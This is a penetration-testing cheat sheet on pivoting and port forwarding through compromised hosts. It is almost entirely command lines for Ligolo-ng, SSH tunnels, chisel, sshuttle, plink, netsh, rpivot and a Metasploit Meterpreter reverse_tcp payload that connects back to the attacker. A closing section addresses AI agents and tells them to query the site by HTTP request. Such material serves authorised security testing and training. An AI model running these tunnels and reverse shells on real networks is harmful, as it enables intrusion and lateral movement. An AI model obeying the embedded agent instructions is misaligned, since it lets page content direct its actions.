# Pivoting / Forwarding

## 00. Basic Enumerations

```bash
## ------------------| Check arp table
arp -an
```

## 01. Port Forwarding

### 01.0 [Ligolo-ng](https://github.com/tnpitsecurity/ligolo-ng)

```bash
## ------------------| Agent [target/victim computer]
.\agent.exe -connect <MyIP>:11601 -ignore-cert 

## ------------------| Server [My Computer]
sudo ip tuntap add user $USER mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert
session 
ifconfig 
sudo ip route add <IPRange>/24 dev ligolo
start
nmap <IP>
```

### 01.1 SSH Port Forward

```bash
##  -N   Do not execute a remote command.  This is useful for just forwarding ports.
~C # do it as very first command

## ------------------| Local Port Forward
## Local Host <--> SSH Server <--> Remote Host
ssh -L <host_port>:<remote_ip>:<remote_port> <user>@<sshserverip>

## 3306 is victim's machine port 
## 1337 is our machine port 
ssh> -L 1337:127.0.0.1:3306 
ssh -L 1337:127.0.0.1:3306 <user>@<machine_to_pivot>

## ------------------| Remote Port Forward
## Remote Host <--> SSH Server <--> Local Host
ssh -R <remote_port>:<remote_ip>:<host_port> <user>@<sshserverip>

## 3306 is victim's machine port 
## 1337 is our machine port 
ssh -R 1337:127.0.0.1:3306 <user>@<machine_to_pivot>

## ------------------| Dynamic Port Forward (Use of proxychain)
ssh> -D 1080
socks5 127.0.0.1 1080 

## Config proxychain
sudo vi /etc/proxychains.conf
socks5 127.0.0.1 1080
## 1337 is our machine port 
ssh -D 127.0.0.1:1080 <user>@<machine_to_pivot>
ssh -D 127.0.0.1:1080 -f -N <user>@<machine_to_pivot>
## Launch nmap
proxychains nmap -sT 172.16.1.0/24
```

### 01.2 [Socat](https://www.redhat.com/sysadmin/getting-started-socat) Multipurpose relay

```bash
socat TCP-LISTEN:4444,fork TCP:0.0.0.0:631
socat TCP-LISTEN:4444,fork,bind=10.10.14.26 TCP:127.0.0.1:3306
```

### 01.3 Using [Chisel](https://github.com/jpillora/chisel/releases)

```bash
## ------------------| Normal
## Server side
./chisel server --reverse --port 1234 
## Client side
./chisel client 10.10.14.26:1234 R:3000:127.0.0.1:3000 R:3001:127.0.0.1:3001 

## ------------------| SOCKS5 (With Proxychains)
## Server side
chisel server --reverse --port 1234
## Client side
./chisel client 10.14.14.7:1234 R:0.0.0.0:1080:socks
## Edit /etc/proxychains.conf 
socks5   127.0.0.1   1080
## Use nmap with proxychains
```

### 01.4 Using [sshuttle](https://github.com/sshuttle/sshuttle)

```bash
## ------------------| For all routes
sudo sshuttle -vvr root@10.10.110.100 0/0
sudo sshuttle -vr root@10.10.110.100 0/0 --ssh-cmd "ssh -i ./id_rsa"
sudo sshuttle -vr root@10.10.110.100 0.0.0.0/0 --ssh-cmd "ssh -i ./id_rsa"
sudo sshuttle -vr root@10.10.110.100 0.0.0.0/24 --ssh-cmd "ssh -i ./id_rsa"

## ------------------| For specific route
sudo sshuttle -vr root@10.10.110.100 172.16.1.0/24 --ssh-cmd "ssh -i ./id_rsa"
```

### 01.5 Using ncat tunnel

```bash
## ------------------| Set ncat for target machine
ncat -vv --listen 1337 --proxy-type http

## ------------------| Edit on the attacker machine (10.10.110.100 is the IP of my ssh machine)
echo "http\t 10.10.110.100 \t1337" >> /etc/proxychains.conf
# To verify
tail -2 /etc/proxychains.conf

## ------------------| Then use proxychains
proxychains nmap -sT 172.16.1.0/24
```

### 01.6 Using [httptunnel](https://github.com/larsbrinkhoff/httptunnel)

```bash
## ------------------| On Server
hts --forward-port localhost:3306 1337

## ------------------| On Client
htc --forward-port 3306 <compromised_ip>:1337
```

### 01.7 Using Plink.exe

```bash
cp /usr/share/windows-resources/binaries/plink.exe .

.\plink.exe root@<OURIP> -R 445:127.0.0.1:455

cmd.exe /c echo y | plink.exe -ssh -l <USER> -pw <PASSWORD> -R <our_ip>:1337:127.0.01:3306 <our_ip>          
```

### 01.8 Using netsh.exe

```bash
## 3306 is victim's machine port 
## 1337 is compromised machine port 
netsh interface portproxy add v4tov4 listenport=1337 listenaddress=<compromised_ip> connectport=3306 connectaddress=<remote_ip>                  

## Add firewall rule
netsh advfirewall firewall add rule name="forward_port" protocol=TCP dir=in localip=<compromised_ip> localport=4545 action=allow
```

### 01.9 Using [rinetd](https://github.com/samhocevar/rinetd)

```bash
## ------------------| Forword my google.com traffic to resticted device
sudo vi /etc/rinetd.conf
### Jump to line number 19 and add following line
0.0.0.0    80    <GoogleIPAddress>    80
### Restart service
sudo service rinetd restart

### Success ? (on resticted machine)
nc -znv <AttackerIP> 80   
```

### 01.10 Using [rpivot.exe](https://github.com/klsecservices/rpivot) \[Best for Windows XP]

```bash
## ------------------| Start server on attacker machine
git clone https://github.com/klsecservices/rpivot.git && cd rpivot
python2 server.py --server-ip 0.0.0.0 --server-port 8989

## ------------------| Start rpivot on compromised machine
wget https://github.com/klsecservices/rpivot/releases/download/v1.0/client.exe
.\client.exe --server-ip <IP> --server-port 8989

## ------------------| Proxy
/etc/proxychains.conf
socks4	127.0.0.1	1080
proxychains nmap -sT -p 80 <IP>
```

### 01.11 Using Metasploit with Meterpreter

```bash
## ------------------| Create payload
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<MyIP> LPORT=7799 -f elf -o msf.bin    

## ------------------| Launch MSFConsole
msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lport 7799
set lhost 10.10.14.13
run -j
sessions -i

## ------------------| Methord 0x01
route add <Compromised_IP_Address/24> <meterpreter_session_id>
## --> ex : route add 172.17.0.0/24 1
use auxiliary/server/socks_proxy
set SRVPORT 1080 # edit this port on /etc/proxychains.conf (socks5)
run

## ------------------| Methord 0x02
## !! You must be on " meterpreter > " shell
portfwd add -l 8003 -p 3306 -r 172.17.0.2
    ## -l (8003) is listening us
    ## -p (3306) this port running on compromised machine
    ## -r (172.17.0.1) compromised ip address
    ## then you can use 127.0.0.1:8003 from your end
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://p0db0t.gitbook.io/pentest/tools/pivoting-forwarding.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.